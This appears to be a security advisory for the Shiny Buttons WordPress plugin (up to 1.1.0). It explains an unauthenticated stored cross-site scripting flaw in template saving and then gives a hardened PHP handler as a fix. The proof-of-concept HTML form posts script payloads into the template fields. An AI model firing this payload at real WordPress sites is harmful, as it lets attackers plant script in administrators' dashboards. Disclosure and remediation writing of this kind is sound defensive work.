
Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not have any authorisation or CSRF checks in place when saving a template (the wpbtn_save_template function hooked to the init action), nor does it sanitise and escape the submitted template fields before outputting them in the admin dashboard. This allows unauthenticated users to add a malicious template, leading to Stored Cross-Site Scripting.

Proof of Concept

```html
<html>
  <body>
    <form action="https://example.com/" method="POST">
      <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
      <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
      <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
      <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
      <input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
      <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
      <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[radius]" value="0" />
      <input type="hidden" name="wpbtn_tpl[width]" value="0" />
      <input type="hidden" name="do" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
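Mitigation

The advisory names three missing controls: a capability check, a CSRF nonce, and sanitise-on-input/escape-on-output for the template fields. The PHP below is an added example of how a WordPress plugin handler covering all three could look; it is not the plugin's own code and is not taken from the advisory. The field names (wpbtn_tpl[...] and do) come from the proof of concept above; the option name wpbtn_templates, the nonce field wpbtn_nonce and action wpbtn_save_template, the font allow-list and the render helper are assumptions made for the example.

```php
<?php
/**
 * Added example (not the plugin's code): a hardened template-save handler for
 * the weakness described in this advisory. Names that are not on the page
 * (option 'wpbtn_templates', nonce field 'wpbtn_nonce', nonce action
 * 'wpbtn_save_template', the font allow-list, the render helper) are assumed.
 */

// Reduce a submitted colour to bare 3- or 6-digit hex, falling back to white.
function wpbtn_sanitize_hex( $value ) {
    $value = ltrim( (string) $value, '#' );
    return preg_match( '/^(?:[0-9a-f]{3}|[0-9a-f]{6})$/i', $value ) ? strtolower( $value ) : 'ffffff';
}

// Allow-list every field of the template array; anything unexpected is dropped.
function wpbtn_sanitize_template( array $raw ) {
    $fonts   = array( 'Michroma', 'Arial', 'Georgia' );      // assumed allow-list
    $weights = array( 'normal', 'bold', 'lighter', 'bolder' );

    return array(
        'id'           => sanitize_key( $raw['id'] ?? '' ),
        'name'         => sanitize_text_field( $raw['name'] ?? '' ),
        // safecss_filter_attr() keeps only allow-listed CSS properties and values;
        // vendor-prefixed gradient syntax may be dropped, which is acceptable here.
        'bg_css'       => safecss_filter_attr( wp_strip_all_tags( (string) ( $raw['bg_css'] ?? '' ) ) ),
        'text_color'   => wpbtn_sanitize_hex( $raw['text_color'] ?? '' ),
        'font'         => in_array( $raw['font'] ?? '', $fonts, true ) ? $raw['font'] : 'Arial',
        'font_size'    => max( 6, min( 72, absint( $raw['font_size'] ?? 12 ) ) ),
        'font_weight'  => in_array( $raw['font_weight'] ?? '', $weights, true ) ? $raw['font_weight'] : 'normal',
        'border_color' => wpbtn_sanitize_hex( $raw['border_color'] ?? '' ),
        'radius'       => absint( $raw['radius'] ?? 0 ),
        'width'        => absint( $raw['width'] ?? 0 ),
    );
}

function wpbtn_save_template_hardened() {
    if ( ! isset( $_POST['do'], $_POST['wpbtn_tpl'] ) || ! is_array( $_POST['wpbtn_tpl'] ) ) {
        return;
    }
    // 1. Authorisation: only users who may manage options can save templates.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. CSRF: the admin form must render wp_nonce_field( 'wpbtn_save_template', 'wpbtn_nonce' ).
    //    check_admin_referer() stops the request if the nonce is missing or invalid.
    check_admin_referer( 'wpbtn_save_template', 'wpbtn_nonce' );

    // 3. Sanitise on input before anything is persisted.
    $tpl = wpbtn_sanitize_template( wp_unslash( $_POST['wpbtn_tpl'] ) );
    if ( '' === $tpl['id'] ) {
        return;
    }
    $templates = get_option( 'wpbtn_templates', array() );   // assumed option name
    $templates[ $tpl['id'] ] = $tpl;
    update_option( 'wpbtn_templates', $templates );
}
// Hooked to admin_init rather than init so the handler never runs for front-end requests.
add_action( 'admin_init', 'wpbtn_save_template_hardened' );

// 4. Escape on output: the dashboard listing escapes each stored value for the
//    context it lands in (HTML text via esc_html, attribute via esc_attr).
function wpbtn_render_template_row( array $tpl ) {
    printf(
        '<tr><td>%s</td><td>%s</td><td><span style="%s;color:#%s">preview</span></td></tr>',
        esc_html( $tpl['id'] ),
        esc_html( $tpl['name'] ),
        esc_attr( $tpl['bg_css'] ),
        esc_attr( $tpl['text_color'] )
    );
}
```

The capability and nonce checks on their own already stop the unauthenticated save shown in the proof of concept; the input allow-listing and output escaping are kept as defence in depth so that a template saved by a legitimate administrator, or one already stored in the database before the fix, cannot execute script in the dashboard either.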

References

https://wpscan.com/vulnerability/29514d8e-9d1c-4fb6-b378-f6b7374989ca
